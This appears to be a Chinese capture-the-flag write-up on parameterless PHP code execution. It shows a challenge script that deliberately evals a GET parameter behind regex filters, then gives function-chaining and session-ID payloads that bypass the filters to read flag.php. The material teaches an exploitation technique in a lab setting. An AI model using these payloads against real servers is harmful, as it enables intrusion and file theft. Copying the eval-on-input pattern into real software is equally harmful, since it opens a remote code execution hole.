web12-考核 无参数RCE
<?php
header("Content-Type: text/html;charset=utf-8");
include "flag.php";
echo "flag在哪里呢?<br>";
highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['exp'])){
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
if (!preg_match('/et|cu|readfile|flip|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
// echo $_GET['exp'];
@eval($_GET['exp']);
}
else{
die("还差一点哦!");
}
}
else{
die("再好好想想!");
}
}
else{
die("还想读flag,臭弟弟!");
}
}
// highlight_file(__FILE__);
?>
函数介绍
localeconv() 获取 '.'
current() pos() :返回当前数组值
next() 获取下一个数组的值
end() 获取最后一个数组的值
array_rand() 返回随机的数字键值
arrat_flip() 数组的键名和键值交换
scandir()返回指定目录中的文件和文件夹
array_reverse() 数组逆序
获取当前目录中的文件
exp=var_dump(scandir(pos(localeconv())));
为了获取数组倒数第二个键值,我们可以先用array_reverse()逆序数组,接着用next()得到 flag.php最后用highlight_file读取内容
payload:exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));
也可以使用 array_flip()将键名和键值交换,再用array_rand()随机读取键名,因为数组长度很小,所以可行
highlight_file(array_rand(array_flip(scandir(pos(localeconv())))));
但是题目中过滤了一下词,没法绕过,就当积累了吧。
还有一种方法是利用session
session_start() 开启session
session_id() 获取 PHPSESSID的值
payload: highlight_file(session_id(session_start()));
接着 修改PHPSESSID的值为flag.php即可